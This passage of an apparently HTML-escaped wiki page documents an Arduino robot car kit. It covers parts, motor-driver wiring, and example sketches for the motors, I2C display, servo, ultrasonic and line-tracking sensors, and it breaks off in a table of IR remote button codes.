    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;USB Cable&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Jumper Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;30&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*6MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;60&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*8MM Flat Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*30MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3MM Nut&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Black)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Red)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Winding Wire (12CM)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Assembly ==&lt;br /&gt;
&lt;br /&gt;
Follow the User Manual. If something is unclear then watch a assembly video. Be careful when installing the motors, make sure they’re all properly aligned, if not the car will pull to one side.&lt;br /&gt;
Especially take care that no cables sticks into the motors.&lt;br /&gt;
&lt;br /&gt;
== Motor control ==&lt;br /&gt;
We control the motor using a H-Bridge L298N Motor Driver. Use a exxternal 5V logic supply when using more than 12V driving voltage.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver.png|500px]]&lt;br /&gt;
&lt;br /&gt;
In our case we need to plug two motors to each motorA and motorB. Connect the power from the battery pack VSS and GND.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver_schematics.png|500px]]&lt;br /&gt;
&lt;br /&gt;
Wire the motor to the Arduino/Sensor Shield as adviced in the user manual.&lt;br /&gt;
&lt;br /&gt;
=== Specification: ===&lt;br /&gt;
* Working Mode: H bridge (double lines)&lt;br /&gt;
* Control Chip: L298N (ST)&lt;br /&gt;
* Logical Voltage: 5V&lt;br /&gt;
* Driving Voltage: 5V-35V&lt;br /&gt;
* Logical Current: 0mA-36mA&amp;gt;&lt;br /&gt;
* Driving Current: 2A (MAX single bridge)&lt;br /&gt;
* Storage Temperature: (-20 °C)-(+135 °C)&lt;br /&gt;
* Maximum Power: 25W&lt;br /&gt;
* Weight: 30g&lt;br /&gt;
* Periphery Dimension: 43 x 43 x 27 mm(L x W x H)&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Initiation ====&lt;br /&gt;
 //define the output pins.&lt;br /&gt;
 int IN1=5;&lt;br /&gt;
 int IN2=6;&lt;br /&gt;
 int IN3=7;&lt;br /&gt;
 int IN4=8;&lt;br /&gt;
 int ENA=9;&lt;br /&gt;
 int ENB=10;&lt;br /&gt;
 void setup() {&lt;br /&gt;
   //set up the pins to act as output.&lt;br /&gt;
   for (int i = 5; i &amp;lt; 11;i++)&lt;br /&gt;
   {&lt;br /&gt;
     pinMode(i,OUTPUT);&lt;br /&gt;
   }&lt;br /&gt;
   delay(5000);&lt;br /&gt;
 }&lt;br /&gt;
==== Rotate Counter Clockwise ====  &lt;br /&gt;
&lt;br /&gt;
 void turnCounterClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Rotate Clockwise ==== &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Forward ====&lt;br /&gt;
&lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Reverse ====&lt;br /&gt;
&lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
  &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Brake ====&lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== I2C Display ==&lt;br /&gt;
The display is controlled with I2C. I am using the Wire and LiquidCrystal_I2C library to control the display.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
&lt;br /&gt;
* I2C Address: 0x27&lt;br /&gt;
* Back Lit (Blue with white char color)&lt;br /&gt;
* Supply Voltage: 5V&lt;br /&gt;
* Interface:I2C/TWI x1,Gadgeteer interface x2&lt;br /&gt;
* Adjustable Contrast&lt;br /&gt;
* Size:82x35x18 mm&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:I2C_Display_Schematics.png|800px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&amp;lt;div style=&amp;quot;border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Note&amp;lt;/b&amp;gt;: Don&#039;t use the library link that is in the manual, it contains a bug where only the first character of the strings is displayed on the I2C display. Download the latest version from https://www.arduinolibraries.info/libraries/liquid-crystal-i2-c.&lt;br /&gt;
&amp;lt;/div&amp;gt; &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 //set the LCD address to 0x27 for a 16 chars and 2 line display&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,16,2);&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
  //initialize the lcd&lt;br /&gt;
  lcd.init();&lt;br /&gt;
  //enable the backlight &lt;br /&gt;
  lcd.backlight();&lt;br /&gt;
  //set the cursor to the first line.&lt;br /&gt;
  lcd.setCursor(3,0);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;Hello&amp;quot;);&lt;br /&gt;
  //set the cursor in the next line.&lt;br /&gt;
  lcd.setCursor(3,1);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;world!&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {}&lt;br /&gt;
&lt;br /&gt;
== Servo Motor ==&lt;br /&gt;
The Servo Motor is controlled with PWM. The Sketch rotates the motor in an angle between 110 and 180 degres.&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Servo_Motor_Schematics.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 int servopin=2;// select digital pin 9 for servomotor signal line&lt;br /&gt;
 int myangle;// initialize angle variable&lt;br /&gt;
 int pulsewidth;// initialize width variable&lt;br /&gt;
 int val;&lt;br /&gt;
 &lt;br /&gt;
 void servopulse(int servopin,int myangle)// define a servo pulse function&lt;br /&gt;
 {&lt;br /&gt;
   pulsewidth=(myangle*11)+500;// convert angle to 500-2480 pulse width&lt;br /&gt;
   digitalWrite(servopin,HIGH);// set the level of servo pin as “high”&lt;br /&gt;
   delayMicroseconds(pulsewidth);// delay microsecond of pulse width&lt;br /&gt;
   digitalWrite(servopin,LOW);// set the level of servo pin as “low”&lt;br /&gt;
   delay(20-pulsewidth/1000);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
   pinMode(servopin,OUTPUT);// set servo pin as “output”&lt;br /&gt;
   Serial.begin(9600);// connect to serial port, set baud rate at “9600”&lt;br /&gt;
   Serial.println(&amp;quot;ready&amp;quot; ) ;&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop(){&lt;br /&gt;
   val = 180;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
   val = 110;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Ultra Sonic Sensor ==&lt;br /&gt;
I used the pins: echoPin 3 and trigPin 4 because 7 and 8 is already taken by the motordriver.&lt;br /&gt;
If you don&#039;t understand the line: distance = duration/58.3;.&lt;br /&gt;
The speed of sound is 343 m/s. We messure the round trip so we need to divide the 343 with 2 which gives us 171.5 m/s. But we don’t want to deal with meters and seconds we want centimeters and microseconds. 17150 cm/s = 0.017150 cm/us = 1cm/58.3 us.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Working Voltage: DC 5V&lt;br /&gt;
* Working Current: 15mA&lt;br /&gt;
* Working Frequency: 40Hz&lt;br /&gt;
* Max Range: 4m&lt;br /&gt;
* Min Range: 2cm&lt;br /&gt;
* Measuring Angle: 15 degree&lt;br /&gt;
* Trigger Input Signal: 10µS TTL pulse&lt;br /&gt;
* Echo Output Signal Input TTL lever signal and the range in proportion&lt;br /&gt;
* Size: 46*20.4mm&lt;br /&gt;
* Weight: 9g&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Ultra_Sonic_Schematics.png|650px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 #define echoPin 7 // Echo Pin&lt;br /&gt;
 #define trigPin 8 // Trigger Pin&lt;br /&gt;
 #define LEDPin 13 // Onboard LED&lt;br /&gt;
 &lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 &lt;br /&gt;
 void setup() {&lt;br /&gt;
  Serial.begin (9600);&lt;br /&gt;
  pinMode(trigPin, OUTPUT);&lt;br /&gt;
  pinMode(echoPin, INPUT);&lt;br /&gt;
  pinMode(LEDPin, OUTPUT); // Use LED indicator (if required)&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop() {&lt;br /&gt;
 /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
  distance of the nearest object by bouncing soundwaves off of it. */ &lt;br /&gt;
  digitalWrite(trigPin, LOW); &lt;br /&gt;
  delayMicroseconds(2); &lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(trigPin, HIGH);&lt;br /&gt;
  delayMicroseconds(10); &lt;br /&gt;
  digitalWrite(trigPin, LOW);&lt;br /&gt;
  duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
  &lt;br /&gt;
  //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
  distance = duration/58.3;&lt;br /&gt;
 &lt;br /&gt;
  if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange){&lt;br /&gt;
   /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
   to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
   Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
   digitalWrite(LEDPin, HIGH); &lt;br /&gt;
  }&lt;br /&gt;
  else {&lt;br /&gt;
   /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
   turn LED OFF to indicate successful reading. */&lt;br /&gt;
   Serial.println(distance);&lt;br /&gt;
   digitalWrite(LEDPin, LOW); &lt;br /&gt;
  } &lt;br /&gt;
  //Delay 50ms before next reading.&lt;br /&gt;
  delay(50);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Line Tracking Sensor ==&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: +5V&lt;br /&gt;
* Operating Current: &amp;lt;10mA&lt;br /&gt;
* Operating Temperature Range: 0°C ~ + 50°C&lt;br /&gt;
* Output Interface: 3-wire interface (1 - signal, 2 - power, 3 - power supply negative)&lt;br /&gt;
* Output Level: TTL level&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Line_Tracking_Sensor_Schematics.png|600px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
I used the pins 0-2 for the 3 line tracking sensors. This sketch is used to test the line tracking sensors.&lt;br /&gt;
 const int sensorPin1 = 0;&lt;br /&gt;
 const int sensorPin2 = 1;&lt;br /&gt;
 const int sensorPin3 = 2; // the number of the sensor pin&lt;br /&gt;
 const int ledPin = 13;      // the number of the LED pin&lt;br /&gt;
 int sensorState = 0;         // variable for reading the sensor status&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     pinMode(ledPin, OUTPUT);&lt;br /&gt;
     pinMode(sensorPin1, INPUT);&lt;br /&gt;
     pinMode(sensorPin2, INPUT);&lt;br /&gt;
     pinMode(sensorPin3, INPUT);&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     // read the state of the sensor value:&lt;br /&gt;
     sensorState = digitalRead(sensorPin1);&lt;br /&gt;
     // if the sensorState is HIGH:&lt;br /&gt;
     if (sensorState == HIGH)&lt;br /&gt;
     {&lt;br /&gt;
         digitalWrite(ledPin, HIGH);&lt;br /&gt;
     }&lt;br /&gt;
     else&lt;br /&gt;
     {&lt;br /&gt;
         digitalWrite(ledPin, LOW);&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Digital IR Receiver Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: 5V&lt;br /&gt;
* Interface: Digital&lt;br /&gt;
* Modulate Frequency: 38kHz&lt;br /&gt;
* Module Interface Socket: JST PH2.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Button&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;HexValue&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;DecValue&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowUp&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF629D&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16736925&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowDown&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FFA857&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16754775&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowRight&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FFC23D&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16761405&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowLeft&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF22DD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16720605&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF6897&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16738455&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF9867&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16750695&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FFB04F&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16756815&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF30CF&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16724175&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF18E7&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16718055&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF7A85&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16743045&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;7&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF10EF&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16716015&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF38C7&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16726215&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
